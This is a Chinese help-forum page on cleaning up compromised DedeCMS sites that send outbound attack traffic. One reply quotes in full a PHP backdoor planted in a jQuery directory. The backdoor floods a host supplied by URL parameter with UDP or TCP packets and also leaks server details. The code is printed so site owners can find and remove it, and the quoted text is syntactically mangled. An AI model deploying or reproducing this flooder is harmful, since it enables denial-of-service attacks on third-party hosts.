织梦cms 总对外发包的解决办法 不要百度的!要切实管用的!

织梦cms 总对外发包的解决办法 不要百度的!要切实管用的!,第1张

DEDE漏洞被利用了,我中过招,后来把会员系统,留言板插件全被删除。根目录被注入几个PHP.ASP文件,你查看一下是否有多余的文件,删除它们就可以了,有的顽固删不掉,只能求助空间商粉碎。

嗯,dede 最近漏洞比较多,我之前也遇到过,程序影藏的很深,我之前的是在 /include/js/jquery/article_aee.php

这个文件,当然可能文件位置有所变动,但发包的代码可能不会变,你全站搜索下看有没有这段代码:

<?php

set_time_limit(86400)

ignore_user_abort(True)

$packets = 0

$http = $_GET['http']

$rand = $_GET['exit']

$exec_time = $_GET['time']

if (StrLen($http)==0 or StrLen($rand)==0 orStrLen($exec_time)==0)

{

if(StrLen($_GET['rat'])<>0)

{

echo$_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']

exit

}

echo "Php 2012 Terminator"

exit

}

 

for($i=0$i<65535$i++)

{

$out .= "X"

}

//Udp1-fsockopen Udp2 pfsockopen Tcp3CC.center

$max_time = time()+$exec_time

if($rand==53)

while(1)

{

$packets++

if(time() > $max_time)

{

break

}

$fp = fsockopen("udp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

else

if($rand==500)

while(1)

{

$packets++

if(time() > $max_time){

break

}

$fp = pfsockopen("udp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

else

while(1)

{

$packets++

if(time() > $max_time){

break

}

$fp = pfsockopen("tcp://$http",$rand, $errno, $errstr, 5)

if($fp)

{

fwrite($fp, $out)

fclose($fp)

}

}

?>

这个代码 就是对我发包的,通过url 请求 带参数 对外发包,希望对你所有帮助!

你最好也登陆FTP看下,有没有最近上传的文件,对最近服务器里面出现的文件进行排查,相信你也会找到病毒程序的。


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/210249.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-04-04
下一篇2023-04-04

发表评论

登录后才能评论

评论列表(0条)

    保存